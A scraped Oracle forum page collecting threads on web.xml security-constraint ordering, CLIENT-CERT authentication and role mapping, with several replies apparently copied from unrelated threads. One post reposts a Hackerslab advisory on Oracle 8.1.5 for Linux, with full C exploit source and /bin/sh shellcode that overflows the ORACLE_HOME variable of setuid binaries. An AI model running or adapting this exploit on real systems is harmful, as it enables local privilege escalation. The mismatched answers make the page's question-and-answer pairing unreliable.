Security constaint in Oracle 10.1.2 - Web.xml

Similar Messages

• Using security-constraint in web.xml; not recognizing url-pattern tag

  I am creating a very simple jsp application within JDeveloper 10.1.3.1. I have 2 jsp files...a readData.jsp and a maintainData.jsp. I would like to deploy this application to Oracle Application Server 10.1.2.2. I would like to use Oracle Internet Directory with Single Sign on enabled. The deployment to OAS works fine. For the security, I would like an administrator user to get to both pages...and a user to only be able to see the readData.jsp. I used the security constraints on the properties of the web.xml file within JDeveloper. Here is my web.xml file:
  <?xml version = '1.0' encoding = 'windows-1252'?>
  <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd">
  <web-app>
  <description>Empty web.xml file for Web Application</description>
  <session-config>
  <session-timeout>35</session-timeout>
  </session-config>
  <mime-mapping>
  <extension>html</extension>
  <mime-type>text/html</mime-type>
  </mime-mapping>
  <mime-mapping>
  <extension>txt</extension>
  <mime-type>text/plain</mime-type>
  </mime-mapping>
  <security-constraint>
  <web-resource-collection>
  <web-resource-name>adm_full_access</web-resource-name>
  <url-pattern>*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
  <role-name>adm_all</role-name>
  </auth-constraint>
  </security-constraint>
  <security-constraint>
  <web-resource-collection>
  <web-resource-name>usr_access</web-resource-name>
  <url-pattern>readData.jsp</url-pattern>
  </web-resource-collection>
  <auth-constraint>
  <role-name>usr_all</role-name>
  </auth-constraint>
  </security-constraint>
  <login-config>
  <auth-method>BASIC</auth-method>
  </login-config>
  <security-role>
  <role-name>usr_all</role-name>
  </security-role>
  <security-role>
  <role-name>adm_all</role-name>
  </security-role>
  </web-app>
  When I deploy to OAS I added an OID account to the adm_all role...this works fine I can log on as that user and get to both jsps. But, when I add my user to the usr_all role within OAS I try to log on to the app...I then enter my SSO username and password and I get Access Denied errors from my browser when trying to access either page. I am confused about the <url-pattern> tag...is that relative to a directory within my deployment? Most of the examples I have seen use servlets...so I was wondering if I can even use the <url-pattern> tag to restrict/allow access to individual jsps? If someone could point me to some documentation on this set-up I would appreciate it!
  Thank you.

  I was able to get this to work. By doing the following:
  <security-constraint>
  <web-resource-collection>
  <web-resource-name>adm_full_access</web-resource-name>
  <url-pattern>*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
  <role-name>adm_all</role-name>
  </auth-constraint>
  </security-constraint>
  I was restricting access to all other groups by uisng <url-pattern>*</url-pattern>. Any other security-constraints set-up after that will not work. So saying * requires usr_all will restrict ALL webpages to ONLY adm_all, regardless of what future constraints say. So, my first security-constraints lists all directories or pages that every user can access. My next security-constraint then list resources that only my admins (adm_all) can acess. Any other security constraints then are set-up for each user role that I have...if adm_all should have access to these then the <role-name>adm_all</role-name> is added to each security constraint.

• Web.xml security-constraint order matters?

  After a long and frustrating debuggin session I've just discovered that the order in which <security-constraint>
  entries are added to the web.xml file matters to OC4J.
  That is if a more laxed rule is matched first the rest
  (even though they might be more precise or even an
  exact match won't be applied.
  Is this normal behaviour?
  EXAMPLE BELOW WORKS - INVERT ENTRIES AND IT WILL FAIL
  <security-constraint>
      <web-resource-collection>
        <web-resource-name>Protected</web-resource-name>
        <url-pattern>/admin*.uix</url-pattern>
      </web-resource-collection>
      <auth-constraint>
        <role-name>DSMSuperUser</role-name>
      </auth-constraint>
    </security-constraint>
    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Secure</web-resource-name>
        <url-pattern>/*</url-pattern>
      </web-resource-collection>
      <auth-constraint>
        <role-name>DSMUser</role-name>
      </auth-constraint>
    </security-constraint>

  Here is an excerpt from the servlet spec stating the proper behavior:
  The container matches URL patterns defined in security constraints
  using the same algorithm described in this specification for matching client
  requests to servlets and static resources as described in SRV.11.1
  SRV.11.1 Use of URL Paths
  Upon receipt of a client request, the web container determines the web application
  to which to forward it. The web application selected must have the the longest
  context path that matches the start of the request URL. The matched part of the URL
  is the context path when mapping to servlets.
  The web container next must locate the servlet to process the request using the
  path mapping procedure described below:
  The path used for mapping to a servlet is the request URL from the request
  object minus the context path. The URL path mapping rules below are used in
  order. The first successful match is used with no further matches attempted:
  1. The container will try to find an exact match of the path of the request to the
  path of the servlet. A successful match selects the servlet.
  2. The container will recursively try to match the longest path-prefix: This is done
  by stepping down the path tree a directory at a time, using the ’/’ character as
  a path separator. The longest match determines the servlet selected.
  3. If the last segment in the URL path contains an extension (e.g. .jsp), the servlet
  container will try to match a servlet that handles requests for the extension.
  An extension is defined as the part of the last segment after the last ’.’ character.
  4. If neither of the previous three rules result in a servlet match, the container will
  attempt to serve content appropriate for the resource requested. If a "default"
  servlet is defined for the application, it will be used.
  The container must use case-sensitive string comparisons for matching.
  So this is STILL an issue w/ 10.1.2.0.2...
  EXAMPLE BELOW WORKS - INVERT ENTRIES AND IT WILL FAIL
  <security-constraint>
  <web-resource-collection>
  <web-resource-name>oemAdmin</web-resource-name>
  <url-pattern>/admin/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
  <role-name>OEM_ADMIN</role-name>
  </auth-constraint>
  <user-data-constraint>
  <transport-guarantee>NONE</transport-guarantee>
  </user-data-constraint>
  </security-constraint>
  <security-constraint>
  <web-resource-collection>
  <web-resource-name>allOem</web-resource-name>
  <url-pattern>/*</url-pattern>
  </web-resource-collection>
  <auth-constraint>
  <role-name>OEM_USER</role-name>
  </auth-constraint>
  <user-data-constraint>
  <transport-guarantee>NONE</transport-guarantee>
  </user-data-constraint>
  </security-constraint>
  If I don't find a SR for this issue I'll open one b/c this is not acceptable.

• Web.xml: security-constraint [un]usable in JSF?

  <security-constraint> in web.xml is a simple, effective and portable method of declaring a web application�s security policies.
  It's been noted, however, in an earlier topic (http://forum.java.sun.com/thread.jspa?threadID=747919&messageID=4279347) that it has it�s limitations in the context of jsf.
  A reasonable solution would be to consult <security-constraint> elements in one�s own web.xml when rendering <h:commandLink>'s on a page according to the security policy.
  Unfortunately, there is no standard method of reading web.xml, other than what�s available from the ServletContext.
  I found some container specific-implementations in the Cargo project from the http://cargo.codehaus.org,
  but I�m looking for a portable solution. Any thoughts?
  Thanks, y�all!

  Use the <security-role-ref> for the Faces Servlet to map the LDAP roles to the logical role names used by the managed bean to determine if links may be rendered.
  Bean code:
  this.isAdmin = context.getExternalContext().isUserInRole("admin");web.xml:
          <security-role>
            <role-name>Local Admin Group</role-name>
       </security-role>
       <security-role>
            <role-name>DBA Group</role-name>
       </security-role>
      <!-- Faces Servlet -->
      <servlet>
          <servlet-name>Faces Servlet</servlet-name>
          <servlet-class>javax.faces.webapp.FacesServlet</servlet-class>
          <security-role-ref>
                <role-name>admin</role-name>
                <role-link>DBA Group</role-link>
         </security-role-ref>
          <security-role-ref>
                <role-name>admin</role-name>
                <role-link>Local Admin Group</role-link>
         </security-role-ref>
      </servlet>

• Edit web.xml programmatically

  And another question
  Can I edit the web.xml from the web application, in session been for example. I want the admin user to add roles from the web application page and grant them to users.
  Then it should be created automatically in the database
  and in web.xml.
  Maybe it is possible to add it in data base but not to web.xml.
  is there a way?
  Thank you, I hope to get answers soon from you.

  There probably are options to do this, but all of them(the ones i know of atleast), are either too cumbersome or an over-kill.
  Why do you want to add security roles/grants for "users" in your "web.xml" ? Apart from compromising security, I think your definitely going to violate some standard there.
  As a general note: In the end, all xml files are parsed and converted to beans. XML files merely are a place holder for convenience. If required you can figure out the bean holding this information and accordingly change the info it.
  Alternatively if you're still persistent in adding this security information on your web.xml the only plausible way i can think of is old-school. Get a file writer and add/edit this info. But this idea is too crazy to even suggest.
  Best suggestion: Design your application in such a way, so as to pick the info from a DB and accordingly handle.
  Cheers,
  K

• Weblogic 10 jaas and login.jsp and web.xml/weblogic.xml security constaints

  Hello,
  I struggled through and got the examples.security.jaas.SampleCallbackHandler.java and examples.common.utils.ExampleUtils.java/ExampleConstants.java into eclipse where they compile. A bean I made can call SambleCallbackHandler like such:
  mybean.logmein(username,password,url). I can then do a mybean.getStatus() or even a mybean.returnCode(). It does seem to correctly identlify that it is authenticating me (I see in stdout logs that it shows success or failures. The problem I have is I do not know how to apply this weblogic and web.xml/weblogic.xml so that if authentication works it redirects me to the page requiring the authentication. In web.xml I have the following set up:
  <security-role>
       <role-name>Admins</role-name>
  </security-role>
  <login-config>
       <auth-method>FORM</auth-method>
       <realm-name>default</realm-name>
       <form-login-config>
            <form-login-page>/login.jsp</form-login-page>
            <form-error-page>/badlogin.html</form-error-page>
       </form-login-config>
  </login-config>
  <security-constraint>
       <web-resource-collection>
            <web-resource-name>empower</web-resource-name>
            <description>These pages are only accessible by authorized users.</description>
            <url-pattern>/admin/*</url-pattern>
            <http-method>GET</http-method>
            <http-method>POST</http-method>
       </web-resource-collection>
  <auth-constraint>
  <description>These are the roles who have access</description>
  <role-name>Administrators</role-name>
  </auth-constraint>
       <user-data-constraint>
       <description>This is how the user data must be transmitted</description>
       <transport-guarantee>NONE</transport-guarantee>
       </user-data-constraint>
  </security-constraint>
  My weblogic.xml has:
  <?xml version="1.0" encoding="UTF-8"?>
  <wls:weblogic-web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wls="http://www.bea.com/ns/weblogic/90" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd http://www.bea.com/ns/weblogic/90 http://www.bea.com/ns/weblogic/90/weblogic-web-app.xsd">
  <wls:security-role-assignment>
  <wls:role-name>Admins</wls:role-name>
  <wls:principal-name>Administrators</wls:principal-name>
  <wls:principal-name>dashap</wls:principal-name>
  </wls:security-role-assignment>
  </wls:weblogic-web-app>
  With this set up, if I try to go to a page in /admin folder in my application, it correctly pops up the login page. The jaas in the bean is doing a loginContext.login(), which I thought does authentication too, but it never goes back to the /admin page I was going to that needed the authentication. With jaas, can I not use the web.xml FORM security option? Do I Need to use j_security in the login.jsp's form's action= option and j_username and j_password for the input type names? How do I use j_username/j_password things if I am using jaas? I could just ignore using the web.xml security stuff and put something in the pages that need authentication, but it would be easier if I could use jaas with the security featurs without doing all that. Note that my code above is using a realm called default just because that was what was in the example I got from the web. Does that need to be something else?

  Hi John,
  I would like magic of course. However, in this case I want something special: my authentication provider uses special means and contents of headers, cookies and service from external identity management systems to determine the user's identity.
  I do not want the application to present the login dialog! I want to derive the identity and the fact that the user is logged in from whatever the authentication provider returns in terms of Subject.
  Ideally, the flow is something like:
  - user accesses an unprotected resource - resource is shown, no interaction with authentication provider
  - user presses a link or button that takes him/her to a protected resource
  - the authentication provider is contacted to work with the identity asserter to establish the identity of the current user and create a subject object for this user
  - the application can access the subject and principals
  - ADF Security recognizes the identity and the roles (based on the principals) and coordinates access based on this.
  the authentication method is client certificate. presumably this prompts WebLogic/OPS to use an identity asserter to work with custom headers and cookies ("... when you configure a web application to use CLIENT-CERT authentication. In this case, WebLogic can perform identity assertion based on values from request headers and cookies. If the header name or cookie name matches the active token type for the provider, the value is passed to the provider."). No login form should be presented to the user, as all information required to perform the authentication is already available.
  I am trying to understand what I must do to have the ADF application adopt the subject set by the authentication provider - if anything?!
  If you more ideas to share - I would love to hear them.
  best regards,
  Lucas

• Client-cert auth impl in web.xml does not work in Oracle Application Server

  Hi,
  I am new to implementing security features on the web applications.. I have developed a new web service using jdev1012 and deployed in OAS 10.1.2. Its working fine according to the business requirements, but I am in need of implementing client-cert authentication to enable the web service available to only those who have client certificate.
  My server details are:
  Oracle Application Server 10g Release 2 (10.1.2)
  Server certificate is in place and SSL mode have been already enabled.. able to access my web service through https://<mydomain.com>/myws/TreqWS as well able to see the WSDL file through https://<mydomain.com>/myws/TreqWS?WSDL.
  I tried to include the following in my web.xml file as part of implementing CLIENT-CERT authentication.
  <security-constraint>
  <display-name>SecurityConstraint</display-name>
  <web-resource-collection>
  <web-resource-name>WSCollection</web-resource-name>
  <url-pattern>/*</url-pattern>
  </web-resource-collection>
  <user-data-constraint>
  <transport-guarantee>CONFIDENTIAL</transport-guarantee>
  </user-data-constraint>
  </security-constraint>
  <login-config>
  <auth-method>CLIENT-CERT</auth-method>
  <realm-name>WSCollection</realm-name> <!-- am not sure about this realm-name and its purpose -->
  </login-config>
  It is not woking as expected, though I have restarted my oc4j container after including this content to the web.xml file. i.e, I am able to invoke the web service though my sample java client program, though I donot have client certificate/keystore.
  I believe I am missing something..Can anyone help me in this regard to implement CLIENT-CERT authentication successfully?
  Thanks,
  Ms

  I am having the same problem with doc and xsl. I have added this
  <mime-mapping>
  <extension>xls</extension>
  <mime-type>application/vnd.ms-excel</mime-type>
  </mime-mapping>
  <mime-mapping>
  <extension>doc</extension>
  <mime-type>application/msword</mime-type>
  </mime-mapping>
  to my web.xml. I even restarted the server. I still see doc and xsl in binary.
  Is there some other setting that needs to take place?
  I am using WL6.1 with fixpack 1.
  I can see the doc and excel files in the browser if I don't go through the weblogic
  server. That just confirms it's not my browser.
  Kumar Allamraju <[email protected]> wrote:
  <!doctype html public "-//w3c//dtd html 4.0 transitional//en">
  <html>
  It works fine for me in 6.1 SP1.
  <br><br>
  If the following doesn't work , can you
  <br>try application/winword instead of application/msword?
  <p>--
  <br>Kumar
  <p>Siming Mu wrote:
  <blockquote TYPE=CITE>Hi,
  <p>I setup in my web.xml a mime mapping as follows,
  <p><mime-mapping>
  <br><extension>doc</extension><mime-type>application/msword</mime-type>
  <br></mime-mapping>
  <p>When I specify a test.doc url, the doc file appears in my browser
  as
  binary data
  <br>instead of download.
  <p>Please reference change request 055002, which decribes this problem. 
  According
  <br>to edocs, it has been fixed in wls6.1sp1.
  <p>But I am seeing it fixed.  Am I doing anything wrong? Thanks.
  <p>Siming</blockquote>
  </html>

• Best practice for integrating oracle atg with external web service

  Hi All
  What is the best practice for integrating oracle atg with external web service? Is it using integration repository or calling the web service directly from the java class using a WS client?
  With Thanks & Regards
  Abhishek

  Using Integration Repository might cause performance overhead based on the operation you are doing, I have never used Integration Repository for 3rd Party integration therefore I am not able to make any comment on this.
  Calling directly as a Java Client is an easy approach and you can use ATG component framework to support that by making the endpoint, security credentials etc as configurable properties.
  Cheers
  R
  Edited by: Rajeev_R on Apr 29, 2013 3:49 AM

• OpenWorld: Explore What's New in Oracle Fusion Middleware's Web Frontier

  Hello All -
  We have a dedicated Web Tier session at the upcoming OpenWorld in San Francisco, Moscone West.
  Oracle Web Tier has comprised Oracle HTTP Server and Oracle Web Cache. Now, with the Sun acquisition, the Oracle Web Tier product line includes Oracle iPlanet Web Server (formerly Sun Java System Web Server) and Oracle iPlanet Web Proxy Server (formerly Sun Java System Web Proxy Server). The new app_grid_plugin consolidates some past plug-ins to connect to the Oracle application grid. Oracle HTTP Server (based on the upcoming Apache 2.4) and Oracle iPlanet Web Server Release 7.1, part of Oracle Database 11g Release 2, will introduce new capabilities. This session showcases these new developments in scalability, security, and manageability best practices for deploying Oracle Web Tier in Oracle Fusion Middleware production environments.
  Title: Oracle Web Tier: Explore What's New in Oracle Fusion Middleware's Web Frontier
  OpenWorld Session ID:      S317982
  Schedule: Tuesday, September 21, 5:00PM | Moscone West L3, Rm 3024
  [http://www.eventreg.com/cc250/sessionDetail.jsp?SID=317982|http://www.eventreg.com/cc250/sessionDetail.jsp?SID=317982]
  Hope to see many of you at OpenWorld this year in San Francisco.
  Cheers.
  cvr

  "What is BPEL y we require that."
  Other people cited good "what is BPEL" technical information. In plain words, BPEL is an XML-based language to implement business processes, to integrate data from various applications so everyone can see it whether it is originally flat-file, XML, messages, legacy systems, whatever.
  Why "we" require it:
  Part 1 (Managers): Allows integrators to quickly build systems based on business process diagrams by non-technical business analysts. Makes data from many applications available to the business, particularly for "real time" monitoring of how the business is doing.
  Part 2 (Engineers): Allows us to get process specifications from the business users and rapidly build applications. Once an XML and/or web-service interface is created for a legacy application, we can re-use it immediately to integrate with other systems.
  I suspect others will clarify/add to this.
  Regards,
  Andy

• Implementing client-cert auth in web.xml in Oracle Application Server

  Hi,
  I am new to implementing security features on the web applications.. I have developed a new web service using jdev1012 and deployed in OAS 10.1.2. Its working fine according to the business requirements, but I am in need of implementing client-cert authentication to enable the web service available to only those who have client certificate.
  My server details are:
  Oracle Application Server 10g Release 2 (10.1.2)
  Server certificate is in place and SSL mode have been already enabled.. able to access my web service through https://<mydomain.com>/myws/TreqWS as well able to see the WSDL file through https://<mydomain.com>/myws/TreqWS?WSDL.
  I tried to include the following in my web.xml file as part of implementing CLIENT-CERT authentication.
  <security-constraint>
  <display-name>SecurityConstraint</display-name>
  <web-resource-collection>
  <web-resource-name>WSCollection</web-resource-name>
  <url-pattern>/*</url-pattern>
  </web-resource-collection>
  <user-data-constraint>
  <transport-guarantee>CONFIDENTIAL</transport-guarantee>
  </user-data-constraint>
  </security-constraint>
  <login-config>
  <auth-method>CLIENT-CERT</auth-method>
  <realm-name>WSCollection</realm-name> <!-- am not sure about this realm-name and its purpose -->
  </login-config>
  It is not woking as expected, though I have restarted my oc4j container after including this content to the web.xml file. i.e, I am able to invoke the web service though my sample java client program, though I donot have client certificate/keystore.
  I believe I am missing something..Can anyone help me in this regard to implement CLIENT-CERT authentication successfully?
  Thanks,
  Ms

  Hello,
  You have different level of integration of SSO services in OC4J 10g (10.1.3).
  If you are using an LDAP server you can integrate that using the LDAP security provider and support SSO between applications. This is documented as part of the Identity Management Integration.
  Also in 10.1.3.0.0 you need to have at least an LDAP server (or bigger identity management solution) to do SSO.
  In 10.1.3.1.0, that should be available this summer, OC4J will have a new security service that will allow applications to be authenticated in a single sing-on fashion. (Stay tuned to the OTN forum we will publish a beta version very soon)
  Regards
  Tugdual Grall

• Need api for changing security role in web.xml !!

  My requirement is to change the value of the deployment descriptor "security-role" (in web.xml) through an api and inturn to persist the new value in web.xml. Also I need to know if this change is automatically redeployed or an explicit redeployment is needed ? In that case how do I redeploy using an api call ?
  I found a lot of apis related to roles like createRole, removeRole etc.. But there are no apis to change the name of the role and inturn persist in web.xml.
  Do I need to provide any more information ? Let me know
  Thanks,
  Karthick

  why and when do you change security-role? try to use ant task (perhaph you need xpath also). it´s the better when you perform task about life´s cycle of application.
  please, describe your problem.
  of course in you change web.xml you must restart the application.

• Security vulnerability in Oracle 8.1.5

  The following email was forwarded to me about possible security vulnerabilities.
  I am looking for verification from both Oracle and the user comunity.
  ================================================================================
  [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
  ================================================================================
  File : Oracle 8.1.5
  SYSTEM : LINUX
  Tested by RedHat Linux 6.2
  INFO :
  There are two security vulnerability in Oracle.
  1. buffer overflow
  It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
  one of the environmental value of Oracle.
  Oracle applications that are vulnerable to buffer overflow are as follow :
  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute
  Thease applications allow an attacker to excute a buffer overflow exploit.
  2. Log-files created
  When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
  following log files are created.
  names
  ======
  -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
  -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
  -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
  oracle
  ======
  -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
  tnslsnr
  =======
  -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
  SOLUTION
  Contact your vendor for a patch or close setuid permission.
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
  ==-------------------------------------------------------------------------------==
  * ** ** * [email protected] [yong-jun, kim]
  * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
  ******** HACKERSLAB (C) since 1999
  ==-------------------------------------------------------------------------------==
  Oracle 8.1.5 exploit
  -by loveyou
  offset value : -500 ~ +500
  #include <stdio.h>
  #include <stdlib.h>
  #define BUFFER 800
  #define NOP 0x90
  #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
  char shellcode[] =
  /* - K2 - */
  /* main: */
  "\xeb\x1d" /* jmp callz */
  /* start: */
  "\x5e" /* popl %esi */
  "\x29\xc0" /* subl %eax, %eax */
  "\x88\x46\x07" /* movb %al, 0x07(%esi) */
  "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
  "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
  "\xb0\x0b" /* movb $0x0b, %al */
  "\x87\xf3" /* xchgl %esi, %ebx */
  "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
  "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
  "\xcd\x80" /* int $0x80 */
  "\x29\xc0" /* subl %eax, %eax */
  "\x40" /* incl %eax */
  "\xcd\x80" /* int $0x80 */
  /* callz: */
  "\xe8\xde\xff\xff\xff" /* call start */
  "/bin/sh";
  unsigned long getesp(void)
  __asm__("movl %esp,%eax");
  int main(int argc, char *argv[])
  char buff, ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset;
  offset = 0 ;
  if ( argc > 1 ) offset = atoi(argv[1]);
  buff = malloc(bsize);
  addr = getesp() - 5933 - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  memset(buff,bsize/2,NOP);
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode;
  buff[bsize - 1] = '\0';
  setenv("ORACLE_HOME",buff,1);
  printf("[ offset:%d buffer=%d ret:0x%x ]\n",
  offset,strlen(buff),addr);
  system(PATH);
  null

  Hi Peter,
  I was told that Oracle8 and Oracle8i Parallel Server on IBM
  RS/6000 AIX comes with its own Lock Manager and this LM does not
  rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
  Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
  (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
  HACMP but came with a special LM.)
  Cluster-wide Filesystems are not used for OPS on Unix, as far as
  I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
  must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
  Logical Volumes on AIX).
  So I guess it should be possible for Oracle to port OPS to Linux.
  No special Cluster-Services would be needed for OPS on Linux,
  just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
  100BaseT).
  Peter Sechser (guest) wrote:
  : Dave,
  : Parallel Server needs some cluster services in order to
  : communicate between several nodes. So, the operating system has
  : to offer things like inter-node communication services,
  : cluster-wide lock communication services and a clusterwide
  : filesystem. I'm not quite sure, to what degree Linux
  offers/will
  : offer these services.
  : Peter
  null

• Error creating acl for (resource). I get this error when entering security info in web.xml.

  We're using iWS 6.0. Is there some security configuration that needs to be done in order to use standard security directives in our web application's web.xml?
  Thanks!

  Hi ,
  I have tried adding the following into web.xml but the security feature just doesnt work and the user can go to any page without any restriction.
  <security-constraint>
  <web-resource-collection>
  <web-resource-name>Declarative Security Test</web-resource-name>
  <url-pattern>/SuperServlet</url-pattern>
  <url-pattern>/*</url-pattern>
  <http-method>post</http-method>
  <http-method>get</http-method>
  </web-resource-collection>
  <user-data-constraint>
       <transport-guarantee>CONFIDENTIAL</transport-guarantee>
       </user-data-constraint>
  <auth-constraint>
  <role-name>guest</role-name>
  <role-name>member</role-name>
  </auth-constraint>
  </security-constraint>
  <login-config>
  <auth-method>BASIC</auth-method>
  </login-config>
  <security-role>
  <role-name>guest</role-name>
  <role-name>member</role-name>
  </security-role>
  The roles mentioned above have been added correctly into tomcat-users.xml..The version of tomcat I am using is tomcat5.0.28.Please help.

• How to add another secure url in web.xml?

  hello i want to secure my web application i have two kind of users i have users and admin.each of them has each certificat users have permission to enter /users and admin have permission to enter /admins/ but i want also users to enter another folder which is /otheruserplace how can i add this in my web.xml file here is my code
  http://pastebin.com/m3e13d3d9

  Just add another url-pattern.
  This has nothing to do with JSF however. More suitable place would have been the Servlets forum.

• Set security contstraints in web.xml

  what all shl i add to my web.xml to add the security constraints..
  i need to make the client cert and authentication

  http://edocs.bea.com/wls/docs61/webapp/web_xml.html